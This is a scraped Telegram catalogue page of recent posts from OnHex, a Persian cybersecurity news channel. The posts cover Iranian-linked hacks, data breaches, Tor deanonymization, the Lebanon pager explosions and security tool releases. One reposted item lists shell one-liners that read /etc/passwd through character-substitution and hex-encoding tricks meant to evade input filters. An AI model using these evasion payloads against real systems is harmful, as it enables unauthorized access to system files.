Обменник глазами владельца

Все о крипте и Факапы

Бережный психолог Лада

Секрет жизни. Здесь пробуждаются ваши мысли и чувства.

Перехватчик сообщений

Настрою бота для поиска клиентов в ТГ чатах для вас

Статистика Избранное

OnHex

Гео и язык канала: Иран, Фарси

Категория: Софт и приложения

#امنیت_سایبری #مهندسی_معکوس #توسعه_اکسپلویت #باگ_بانتی
#Cybersecurity #infosec #ReverseEngineering #ExploitDev #Redteam #bugbounty #OffensiveSecurity #crypto
دونیت و شبکه های اجتماعی:
https://zil.ink/onhexgroup
@seyyidy
تبلیغات و تبادل:
@onhex_ir_ADS

Связанные каналы | Похожие каналы

Гео и язык канала

Иран, Фарси

Категория

Софт и приложения

Статистика

Избранное

Фильтр публикаций

Скрывать удаленные

Скрывать репосты

OnHex

28 Sep, 12:22

🔴 به نقل از صابرین نیوز:

سایت عبری: ارتش اسرائیل فرکانس برج مراقبت فرودگاه بین المللی الحریری در بیروت را هک کرد و اعلام کرد که اسرائیل برای هدف قراردادن یک هواپیمای غیرنظامی ایرانی که قرار بود در آنجا فرود بیاید، اقدام خواهد کرد فرودگاه به هواپیما بگوید وارد حریم هوایی کشور نشود، به هواپیما اعلام شد و او بازگشت.

#اسرائیل

🆔 @onhex_ir
➡️ ALL Link

273 0 6 2

OnHex

27 Sep, 19:35

Репост из: RedTeam

cat ${HOME:0:1}etc${HOME:0:1}passwd

echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat xxd -r -ps

484 0 14 3

OnHex

27 Sep, 19:35

تبلیغات و تبادل

835 0 0

OnHex

27 Sep, 17:19

🔴 استفاده از هوش مصنوعی در IDA با پلاگین AIDAPAL

در این ویدیو با استفاده از پلاگین AIDAPAL و به کمک هوش مصنوعی (AI)، کدهای دیکامپال شده در IDA Pro رو به متن تبدیل میکنیم.

مطلب در سایتمون

#مهندسی_معکوس #هوش_مصنوعی
#AI #ReverseEngineering #idapro #ArtificialIntelligence

🆔 @onhex_ir
➡️ ALL Link

استفاده از هوش مصنوعی در IDA با پلاگین AIDAPAL

در این ویدیو رفتیم سراغ پلاگین AIDAPAL، نحوه ی دانلود، نصب و استفاده از این پلاگین رو بصورت کامل در IDA Pro (نسخه ی ویندوزی) بررسی کردیم. این پلاگین کدهای دیکامپایل شده در IDA PRO رو از شما میگیره و به کمک هوش مصنوعی (Artificial intelligence) به شما میگه که این کدها چه کاری انجام میدن. همچنین در خو...

1k 0 25 3

OnHex

27 Sep, 11:43

🔴 نشریه ی Politico روز پنجشنبه خبر داده که هیئت منصفه دادگاه چندین ایرانی رو به دلیل هک ستاد انتخاباتی ترامپ، متهم اعلام کرده. فعلا اسامی این افراد منتشر نشده اما احتمالا امروز جمعه، توسط وزارت دادگستری آمریکا علیه اشون اعلام جرم میشه.

هکرهای منتسب به ایران ستاد انتخاباتی ترامپ رو هک و یسری داده ازش استخراج کردن و این داده ها رو به روزنامه نگاران و ستاد انتخاباتی نامزد رقیب، کامالا هریس، فرستادن.

مایکروسافت در گزارشی این حمله رو منتسب به ایران و اعلام کرده بود که این حمله از طریق فیشینگ نیزه ای صورت گرفته.

گوگل در گزارشی عنوان کرده که ایرانی ها علاوه بر ترامپ، حملاتی رو به ستاد انتخاباتی بایدن انجام دادن، اما نشونه ای که مشخص کنه این حملات موفقیت آمیز بوده، وجود نداره.

آژانس های امنیتی آمریکا اعلام کردن که روسیه و چین و ایران، تلاش میکنن تا انتخابات آمریکا رو به نفع خودشون، تحت تاثیر قرار بدن. / منبع

#ترامپ #بازیگران_تهدید
#APT

🆔 @onhex_ir
➡️ ALL Link

Iranians indicted in connection with Trump campaign hack

The indictment could be unveiled as soon as Friday.

1.1k 0 6 5

OnHex

26 Sep, 14:44

🔴 ثبت نام مسابقه ی Flare on 11 باز شده.

برای ثبت نام میتونید از این لینک استفاده کنید.

#CTF #flareon11

🆔 @onhex_ir
➡️ ALL Link

1.3k 0 12 2

OnHex

26 Sep, 10:57

🔴 نسخه وردپرس آسیب پذیر برای آگوست 2024 منتشر شد

نسخه ماه آگوست وردپرس آسیب پذیر ، با 62 پلاگین و 61 آسیب پذیری، که اغلبشون XSS و LFI و SQL injection هستن، منتشر شد.

لینک پروژه در گیتهاب

#وردپرس_آسیب_پذیر #توسعه_اکسپلویت #باگ_بانتی

🆔 @onhex_ir
➡️ ALL Link

نسخه وردپرس آسیب پذیر برای آگوست 2024 منتشر شد

نسخه ماه آگوست وردپرس آسیب پذیر ، با 62 پلاگین و 61 آسیب پذیری ،که اغلبشون XSS و LFI و SQL injection هستن، منتشر شد.

1.4k 0 15 1

OnHex

25 Sep, 22:31

00:06

Видео недоступно для предпросмотра

Смотреть в Telegram

🔴 سورس کد پلیر خاطره انگیز Winamp منتشر شد.

#سورس_کد
🆔 @onhex_ir
➡️ ALL Link

1.4k 0 23 8

OnHex

25 Sep, 21:58

🔴 حمله سایبری به تصفیه خانه ی شهر آرکانزاس

تصفیه خانه ی شهر آرکانزاس دو روز پس از اینکه مرکز اشتراک‌گذاری و تحلیل اطلاعات آب (WaterISAC)، یک سازمان غیرانتفاعی که به حفاظت از تأسیسات آب در برابر تهدیدات فیزیکی و سایبری کمک میکنه، یک هشدار تهدید TLP:AMBER درباره بازیگران تهدید مرتبط با روسیه رو صادر کرد که بخش آب رو هدف قرار میدن، مورد حمله سایبری قرار گرفت.

در جریان این حمله سایبری که آخر هفته رخ داده، عملیات بصورت دستی انجام شده. البته سرویس دهی قطع یا تغییری در آب ایجاد نشده، فقط به دلیل مشکلات در برخی از پمپها، در برخی ساعات افت فشار آب داشتن.

در سالهای گذشته، علاوه بر روسیه، ایران و چین هم بخش آب آمریکا رو هدف حملات سایبری قرار دادن.

امروز CISA اعلام کرده که بازیگران تهدید که دستگاههای صنعتی قابل مشاهده از طریق اینترنت رو هدف قرار میدن، از حملات غیر پیچیده مانند brute force و اعتبارنامه های پیش فرض استفاده میکنن.

آژانس امنیت سایبری به اپراتورهای OT/ICS در بخش‌های زیرساختی حیاتی که در معرض حمله قرار دارن، توصیه کرده تا با اعمال اقداماتی که در توصیه‌های ماه مه به اشتراک گذاشته شده بود، در برابر فعالیت‌های مخرب دفاع کنن. [منابع : 1 و 2]

#بازیگران_تهدید #ICS

🆔 @onhex_ir
➡️ ALL Link

2k 0 16 3

OnHex

25 Sep, 09:18

🔴 اگه به بحث فازینگ علاقمند هستید، رامین فرج پور، یک دوره ای رو برای این منظور تدوین کرده.

این دوره در 8 فصل زیر ارائه شده:

Chapter 1 – Fuzzing Introduction
Chapter 2 – Static & Dynamic Fuzzing
Chapter 3 – Symbolic & Concolic Execution
Chapter 4 – Python Fuzzing
Chapter 5 – Go Fuzzing
Chapter 6 – Rust Fuzzing
Chapter 7 – Java Fuzzing
Chapter 8 – Web Fuzzing

#دوره #fuzzing

🆔 @onhex_ir
➡️ ALL Link

GitHub - raminfp/the-art-of-fuzzing: Application Fuzzing: Tools, Techniques, and Best Practices

Application Fuzzing: Tools, Techniques, and Best Practices - raminfp/the-art-of-fuzzing

1.4k 0 80 11

OnHex

24 Sep, 13:29

🔴 تغییرات جدید در تلگرام

تلگرام برای مبارزه با محتوای مجرمانه، چند تغییر رو قراره اعمال کنه:

1- قبلا تلگرام، اطلاعات حساس کاربران رو برای پرونده های مرتبط با تروریسم ارائه میکرد، اما حالا اعلام کرده که اگه دستور معتبری از مقامات قضایی دریافت کنه که مشخص کنه شما فعالیت مجرمانه دارید و شرایط سرویس تلگرام رو نقض میکنید، یک تحلیل قانونی روی درخواست انجام میگیره و ممکنه تلگرام تلفن و IP کاربر رو به مقامات ارائه بده. اگه داده ای به اشتراک گذاشته بشه، اونو در گزارش شفافیت سه ماهه درج میکنن. البته این بات در زمان نگارش این پست، در حال بروزرسانی بود.

2- تلگرام همچنین ویژگی جستجوش رو هم بهبود داده. از این ویژگی جستجو برای فروش و تبلیغ کالاهای غیرقانونی استفاده میشد. در حقیقت یک تیم اختصاصی اومده محتواهای مشکل دار رو از نتایج جستجو حذف کرده. همچنین از کاربران خواسته شده تا از طریق بات SearchReport، عبارت جستجویی که منجر به یافتن مطالب غیرقانونی میشه رو گزارش بدن.

پاول دروف گفته که این اقدامات منجر به دلسرد شدن مجرمین میشه. جستجوی تلگرام برای پیدا کردن دوستان و اخبار هستش نه برای یافتن کالاهای غیرقانونی. ما اجازه نخواهیم داد که بازیگران تهدید، یکپارچگی پلتفرم ما رو برای تقریبا یک میلیارد کاربر به خطر بندازن.

#تلگرام

🆔 @onhex_ir
➡️ ALL Link

1.7k 0 18 14

OnHex

24 Sep, 12:02

🔴 تو این چند روز اخیر، یسری کمپانی های بزرگ دچار نقض داده شدن که مهمتریناش :

- یک بازیگر تهدید، ادعای فروش داده های وام بانکی آمریکایی که مربوط به یک میلیون کاربر هستش، کرده. این داده ها شامل IP، آدرس، نام بانک و ... هستش.

- افشای اطلاعات 4002 کارمند Oracle. این داده ها شامل نام و نام خانوادگی، عنوان شغلی، آدرس ایمیل، شهر، کشور و ... هستش.

- یک بازیگر تهدید مدعی فروش داده های تجاری و KYC کرده. حجم این داده ها 450 گیگ و 350,125 تصویر هستش. بین داده ها، ایران هم هستش که تعدادشون 3501 هستش.

- افشای اطلاعات 10800 کارمند شرکت DELL و شرکاش. این داده ها شامل نام کامل، ID، وضعیت و شناسه ی داخلی کارمندان میشه.

- افشای 283 هزار رکورد از داده های Uber Eats. داده ها شامل جزییات سفارش و تراکنش های مالی هستش.

- افشای 3.3 میلیون ردیف اطلاعات حساس از EasyMPS. داده ها شامل نام، ایمیل، تلفن، آدرس و ... هستش.

- افشای داده از SpaceX . این داده ها شامل ایمیل، هش، IP و ... هستش.

⚠️ در زمان نوشتن این پست، کمپانیها بصورت رسمی این نقض ها رو تایید نکردن.

#نقض_داده #افشای_اطلاعات

🆔 @onhex_ir
➡️ ALL Link

1.3k 0 17 4

OnHex

23 Sep, 11:48

🔴 نسخه ی سوم ابزار معروف آنالیز فریمورها، Binwalk، بصورت بتا منتشر شد.

نسخه ی سوم این ابزار در Rust بازنویسی شده و برای تست و رفع باگ های احتمالی در اختیار کاربران قرار گرفته.

علاوه بر بازنویسی در RUST، خروجی خلاصه شده بصورت JSON ، آنالیز با چند Thread، بهبود در تطبیق الگوها و گزارش دهی و امضاها (لیست Signature های پشتیبانی شده در شکل بالاست) و استخراج هوشمند از جمله پیشرفتهایی هستش که به این نسخه اضافه شده.

این ابزار فقط لینوکس های 64 بیتی رو پشتیبانی میکنه و روی لینوکس های Debian/Ubuntu تست شده، اما پیشنهاد دادن که از لینوکس های مبتنی بر دبیان استفاده کنید.

نحوه ی استفاده اش هم مثله نسخه های قبلی هستش.

#ابزار
#Firmware #IOT #binwalk

🆔 @onhex_ir
➡️ ALL Link

1.6k 0 26 3

OnHex

22 Sep, 14:36

🔴 مرکز ملی هماهنگی امنیت سایبری اوکراین (NCCC) استفاده از تلگرام رو در سازمانهای دولتی، واحدهای نظامی و زیرساختهای حیاتی، بدلیل نگرانی های امنیت ملی، بخصوص در خصوص خطرات مرتبط با جنگ با روسیه، ممنوع اعلام کرد.

نکته جالبی که وجود داره، رئیس اطلاعات دفاعی اوکراین، Kyrylo Budanov، هشدار داده که سرویسهای اطلاعاتی روسیه میتونن به داده ها و پیامهای کاربران از جمله اونایی که حذف شدن، دسترسی داشته باشن. ایشون گفته که تلگرام نه تنها حریم خصوصی کاربران رو تحت تاثیر قرار میده، بلکه یک تهدید امنیت ملی هم هستش.

مقامات اوکراینی به نمایندگی از سرویس امنیتی این کشور و ستاد کل نیروهای مسلح همچنین هشدار دادن که روسیه "فعالانه" از تلگرام برای حملات سایبری، فیشینگ، توزیع بدافزار و هماهنگی حملات موشکی استفاده میکنه.

برای مقابله با این تهدیدات، NCCC، تلگرام رو روی دستگاه‌های رسمی مورد استفاده کارمندان دولت، ارتش، امنیت، بخش دفاعی و پرسنل زیرساخت‌های حیاتی ممنوع کرده، به استثنای اونایی که برحسب وظیفه، میتونن ازش استفاده کنن.

علیرغم این ممنوعیت، تلگرام همچنان به طور گسترده برای ارتباطات و انتشار اخبار در اوکراین از جمله به روز رسانی حملات هوایی روسیه استفاده میشه، با توجه به اینکه این ممنوعیت برای کاربران عادی اعمال نمیشه.

مقامات اوکراینی، از جمله رئیس جمهور ولودیمیر زلنسکی، احتمالاً به استفاده از این اپلیکیشن در ارتباطات عمومی خود ادامه خواهد داد، چون این اپلیکیشن در میان اوکراینی ها بطورگسترده استفاده میشه./منبع

#تلگرام

🆔 @onhex_ir
➡️ ALL Link

اخبار و آموزشهای امنیت سایبری

اخبار آسیب پذیری ها، رویدادهای رایگان، آموزش ها، پادکست ها و ... در حوزه امنیت سایبری

1.8k 0 10 3

OnHex

22 Sep, 10:35

🔴 حضور هکرهای منتسب به ایران، در شبکه کشورهای خاورمیانه

گوگل (Mandiant) گزارشی منتشر کرده از یک APT پیچیده ایرانی، با نام UNC1860، که کارش ایجاد دسترسی اولیه و پایداری برای بقیه گروههاست.

#بازیگران_تهدید #APT #UNC1860

🆔 @onhex_ir
➡️ ALL Link

حضور هکرهای منتسب به ایران، در شبکه کشورهای خاورمیانه

گوگل (Mandiant) گزارشی منتشر کرده از یک APT پیچیده ایرانی، با نام UNC1860، که کارش ایجاد دسترسی اولیه و پایداری برای بقیه گروههاست.

2.4k 0 32 11

OnHex

21 Sep, 13:38

🔴 پیجرها و بی سیم های حزب الله چطوری منفجر شد؟

در این پست مقاله گاردین و محققای Bellingcat، در خصوص انفجار پیجرها و بی سیم ها در روز سه شنبه و چهارشنبه در لبنان رو بررسی کردیم.

#بازیگران_تهدید #osint #پیجر

🆔 @onhex_ir
➡️ ALL Link

پیجرها و بی سیم های حزب الله چطوری منفجر شد؟

در این پست مقاله گاردین و محققای Bellingcat، در خصوص انفجار پیجرها و بی سیم ها در روز سه شنبه و چهارشنبه در لبنان رو بررسی کردیم.

2.4k 0 36 8

OnHex

20 Sep, 12:19

🔴 قسمت دوم پادکست No Such با زیرنویس فارسی

در قسمت دوم پادکست No Such که توسط NSA منتشر میشه، در مورد مفهوم امنیت سایبری در NSA صحبت میکنن. در کل اینکه NSA به چه چیزی امنیت سایبری میگه، چشم انداز و اهداف این آژانس در حوزه ی امنیت سایبری چیه و مشارکتهایی که NSA با ارتش و بخش های نظامی داره، صحبت میکنن.

مهمانان این قسمت، آقای Dave Luber، مدیر امنیت سایبری NSA و سرلشگر Jerry Carter، معاون مدیر امنیت سایبری برای پشتیبان رزمی هستن.

نکته ای که وجود داره، اینا نگاه متفاوتی نسبت به امنیت سایبری دارن و اونو صرفا هک دو تا دیتابیس و ... نمیدونن.

اگر زبان انگلیسی خوبی دارید، میتونید این پادکست رو از منبع اصلی اون مشاهده یا گوش بدید، در غیر این صورت، از طریق آپاراتمون میتونید با زیرنویس فارسی مشاهده کنید.

لینک مطلب در سایتمون

#پادکست
#NSA #NoSuchPodcast

🆔 @onhex_ir
➡️ ALL Link

Видео недоступно для предпросмотра

Смотреть в Telegram

پادکست No Such - [قسمت دوم] : امنیت سایبری، امنیت ملی است

در قسمت دوم پادکست No Such که توسط NSA منتشر میشه، در مورد مفهوم امنیت سایبری در NSA صحبت میکنن. در کل اینکه NSA به چه چیزی امنیت سایبری میگه، چشم انداز و اهداف این آژانس در حوزه ی امنیت سایبری چیه و مشارکتهایی که NSA با ارتش و بخش های نظامی داره، صحبت میکنن. مهمانان این قسمت، آقای Dave Luber، مدیر ...

2k 0 26 6

OnHex

20 Sep, 11:38

🔴 قسمت چهارم، این مجموعه آموزشی منتشر شد.

#بدافزار #توسعه_بدافزار #تیم_قرمز

🆔 @onhex_ir
➡️ ALL Link

Malware Development - Mythic C2 Agent Development Part 4

Malware Development is not only for shellcode runners, it is also for creating exploits and C2 frameworks. Join me on this stream where we continue the series of Mythic C2 agent development! We are getting closer and closer to the end goal of having a nice and easy powershell beacon. 🚀 In this stre...

3.1k 0 45 5

OnHex

19 Sep, 23:22

🔴 اخیرا یک گزارش تحقیقی توسط پورتال آلمانی Panorama منتشر شده که در اون مشخص شده مجریان قانون از آلمان و چندین کشور دیگه، از طریق حملات تحلیل زمانی طی چند سال، روی تعداد زیادی از گره های TOR، تونستن اپراتورهای یک پلتفرم کودک آزاری که 400هزار عضو داشت، رو شناسایی و دستگیر کنن.

حملات تحلیل زمانی، حملاتی هستن که ازش برای شناسایی کاربران ناشناس، بدون اکسپلویت نقص خاصی در نرم افزار، بلکه با مشاهده زمان ورود و خروج داده ها در شبکه، استفاده میکنن.

اگه مهاجم برخی از گره های TOR رو کنترل کنه یا نقاط ورود و خروج رو زیر نظر داشته باشه، میتونه زمان ورود و خروج داده ها در شبکه رو مقایسه کنه و اگه مطابقت داشته باشه، ترافیک رو به فرد خاصی رهگیری کنه.

همچنین در این گزارش اومده که یکی از کاربران از طریق نسخه ی قدیمی Ricochet شناسایی شده. Ricochet یک پیامرسان ناشناس هستش که برای ایجاد کانالهای ارتباط خصوصی از TOR استفاده میکنه. این نسخه ی قدیمی شامل محافظ Vanguard نیست و در نتیجه در برابر حملات guard discovery آسیب پذیر هستش.

پروژه TOR نسبت به این گزارش واکنش نشون داده. در قدم اول نسبت به عدم دسترسی به اسناد دادگاه جهت بررسی مفروضات امنیتی و تایید و آنالیز اونا ابراز ناامیدی کرده.

همچنین اعلام کرده که این حملات مربوط به 2019 و 2021 هستن و با بروزرسانی هایی که در این مدت انجام دادن، اعمال حملات تحلیل زمانی رو سختتر کردن.

همچنین نسخه ی Ricochet مورد استفاده، در ژوئن 2022 منسوخ و نسخه ی Ricochet-Refresh اومده که دارای محافظ Vanguards-lite هستش و در برابر حملات تحلیل زمانی و guard discovery، امن هستش./ منبع

#مجریان_قانون #TOR

🆔 @onhex_ir
➡️ ALL Link | Boost

Tor says it’s "still safe" amid reports of police deanonymizing users

The Tor Project is attempting to assure users that the network is still safe after a recent investigative report warned that law enforcement from Germany and other countries are working together to deanonymize users through timing attacks.

2.5k 0 43 10

OnHex

17 Sep, 16:32

🔴 اسرائیل یک حمله سایبری به جنوب لبنان انجام داده که در اون یسری پیجر، که گفته شده مورد استفاده ی نیروهای حزب الله لبنان بوده، منفجر شدن. در اثر انفجار باتری این پیجرها گویا صدها نفر زخمی شده.

#بازیگران_تهدید

🆔 @onhex_ir
➡️ ALL Link | Boost

2.8k 0 37 17

Показано 20 последних публикаций.

8 927

подписчиков

Статистика канала

Популярное в канале

🔴 هک 20 بانک ایرانی و پرداخت باج 3 میلیون دلاری رسانه ی Politico خبری منتشر کرده مبنی بر حمله سا...

🔴 ویدیوهای کنفرانس امنیت سایبری Off by One 2024 ویدیوهای کنفرانس Off by One 2024، که یک کنفرانس ...

🔴 پشت صحنه ی ماجرای دستگیری پاول دوروف نشریه ی لیبراسیون مقاله ای در خصوص پرونده ی پاول دوروف، م...

🔴 عملیات ضدجاسوسی ایران گوگل (Mandiant) یک گزارشی منتشر کرده، در خصوص عملیات ضد جاسوسی ایران با ...

🔴 اگه دنبال دوره ی خاصی هستید، این مخزن گیتهاب رو چک کنید، شاید در سایتهایی که معرفی کرده، پیداش ...